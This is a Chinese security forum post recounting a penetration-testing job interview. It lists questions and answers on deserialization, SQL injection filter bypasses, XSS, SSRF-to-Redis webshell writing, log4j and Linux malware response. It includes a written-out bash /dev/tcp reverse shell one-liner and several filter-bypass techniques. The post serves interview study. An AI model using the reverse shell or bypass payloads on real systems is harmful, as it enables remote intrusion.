3月4日奇安信-一面-面试经历分享

guizhidao   ·   发表于 2022-03-04 18:32:45   ·   面试经验分享

在此非常感谢以前的大佬分享的面试题(比如招聘置顶帖:渗透测试面试问题2019版,内含大量渗透技巧)
这次就被问到很多上面的问题,分享此次经历给大家,希望对正在面试的大家有所帮助。
(个人的答案很多地方可能不对,仅供抛砖引玉,也欢迎大家指正)

1.反序列化了解吗?FASTJSON、shiro反序列化原理?实操过吗?如何检测反序列化是否存在?

了解,原理是状态信息转换为字符串,反序列式字符串转换为状态信息
实操过,php的反序列化就是利用serialize函数进行序列化,通过construst/destruct/wakeup/to_string触发

然后他就问我FASTJSON、shiro的反序列化的原理,检测,实操
我因为没做过,就傻了,待会儿写完了就去练练

2.sql注入如果空格被过滤了怎么绕过?

比如mysql的%0a,%a0,%0b,还有其他一些替换,比如注释
(19面试题有答案:代替空格的方法:1.%0a、%0b、%a0 等  2./**/ 等注释符     3. )

3.宽字节了解吗?原理是什么?如何进行防护?

了解,产生原因是后端编码与数据库编码不一致。
gbk编码中文占两个字节,通过拼凑比如%df和/转义符形成一个汉字。
防护的话尽量保持编码一致性,同时对输入的数据进行过滤,比如白名单或者正则

4.如果单引号被过滤如何绕过?

宽字节,hex编码,如果是魔术方法,可以尝试head注入绕过

5.xss了解吗?几种类型?区别是什么?如何检测是否存在xss?xss的大小写可以绕过防护吗?xss防护怎么绕过?

了解:反射型/存储型/dom型
区别是反射型恶意传参大概率在url里,存储型是通过xss平台存储在目标服务器里,dom是js操作浏览器和内容的一个借口,dom型数据可以不过数据包
大小写的话我认为如果是正则过滤的防护方式可以绕过,
绕过方式我当时只说了一个native编码,其实现在想想应该是跟waf一个思路,再加上实体化编码的绕过方法

6.ssrf了解吗?说说

ssrf是服务器请求伪造,可以通过dict ip等方法探测端口,还可以尝试file协议读取文件,如果探测到6379redis端口,因为其root默认无密码,可以通过gopher协议写入一句话webshell

7.常用端口了解吗?6379、ssh、1433、1521、3306、3389、7001、2375端口都是什么服务?

2375当时没有回答上来,后来查到是docker端口

8.RDP连接的电脑关机了怎么办?

我有点蒙,回答的是如果物理已经关机了,那就可能没有办法远程物理开启了
现在想想其实面试官的意思可能是被挤掉线了?

9.我看你写了审计出ibos的代码执行漏洞,那你是如何审计出来的呢?

正常说流程就行,千万不要紧张

10.ASPX的马和ASP的马有什么区别?

感谢19面试题的大佬

11.app渗透会吗?

会,通过burp抓包,进行测试

12.如果抓不了包怎么办?

可能对方根据burp特征信息抓取到了(自己瞎猜),那可以修改特征传参,同时如果抓不了包,可以尝试比如反射型xss的测试

网上答案:可以装xposed或者root下用Frida绕过https强校验

13.应急响应了解吗?如果linux电脑中病毒了怎么办?

应急响应了解,按照下面思路说了说

linux电脑如果中病毒解决方案:(建议大家查查,我的很不保证对)
top 查看进程,如果是挖矿病毒肯定占用cpu较高,然后ps -aux锁定文件位置,kill all命令杀死看看是扔否存在进程,若存在可能存在守护进程或其为子进程,去定时任务/etc/crontab和自启动文件/etc/init.d去查看,如果存在奇怪文件进一步查找,然后利用chattr -i 和chmod 000命令锁定权限,kill杀死进程,然后再删除文件,最后检查是否有可以进程

14.会什么语言?能做到什么程度?

15.webshell免杀会吗?比如过d盾?

当时紧张了没想起来,只说直接用网上的一些绕过姿势了,想不起来的同学和我一起巩固课程吧

16.逆向和免杀木马了解吗?

不太了解(摊手.jpg)

17.反弹 shell 的常用命令知道吗?

bash -i>&/dev/tcp/x.x.x.x/4444 0>&1

18.去年比较火的 log4j漏洞了解吗?复现过吗?原理是什么?

了解,复现过,原理我个人理解是lookup函数引用外部jndi接口,从而可以访问外部数据以及恶意的class(我想说js,但是不知道是不是没敢说)
(公开课有靶场,然后复现视频在b站公众号专栏:前天发的好像)

19.cdn检测方法?cdn如何绕过获取真实ip地址?

20.3389无法连接的几种情况?

21.CSRF 和 XSS 和 XXE 的区别?如何防护?

22.sql注入如何防护?

23.文件包含的常见函数?

24.你如何进行日志查看,使用什么工具?

25.linux定时任务的命令是什么?查看进程的命令是什么?

26.waf的规则使用过吗?说说你写过的简单的规则

27.如果终端中了病毒,你会使用哪些软件进行查杀?

28.如何确定linux病毒是否存在守护进程?

29.xss你使用什么工具进行扫描?

30.工作组渗透如何进行?

总结:
1.简历上的项目尤其是工作经历一定会问,要深入了解,越深越好:
原理->其他函数->实操->防护如何绕过 等等
2.如果让你自我介绍,一定尝试往自己擅长方便引,“熟悉XXXX,擅长XXX”
3.尽量拿src排名,在校生ctf一定尽量打
4.应急响应,病毒处理一定要去学习了解
5.不知道也说说自己的思路,万一蒙对了呢
6.各种漏洞的工具尽量去尝试了解,很可能会问你用过哪些,包括burp等插件

用户名金币积分时间理由
般若 8.00 0 2022-03-07 14:02:47 一个受益终生的帖子~~
般若 8.00 0 2022-03-07 14:02:40 一个受益终生的帖子~~
般若 40.00 0 2022-03-07 14:02:38 一个受益终生的帖子~~
般若 16.00 0 2022-03-07 14:02:38 一个受益终生的帖子~~
般若 4.00 0 2022-03-07 14:02:37 一个受益终生的帖子~~
般若 8.00 0 2022-03-07 14:02:36 一个受益终生的帖子~~
般若 8.00 0 2022-03-07 14:02:30 一个受益终生的帖子~~
Track-劲夫 50.00 0 2022-03-04 19:07:58 一个受益终生的帖子~~

打赏我,让我更有动力~

3 条回复   |  直到 2022-3-8 | 1765 次浏览

Track-劲夫
发表于 2022-3-4

不错哦

评论列表

  • 加载数据中...

编写评论内容

by盛夏
发表于 2022-3-7

师傅是哪的奇安信,薪资咋样?

评论列表

  • 加载数据中...

编写评论内容

1779113275
发表于 2022-3-8

在校生不是网安专业 没打过ctf有机会嘛

评论列表

  • 加载数据中...

编写评论内容
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.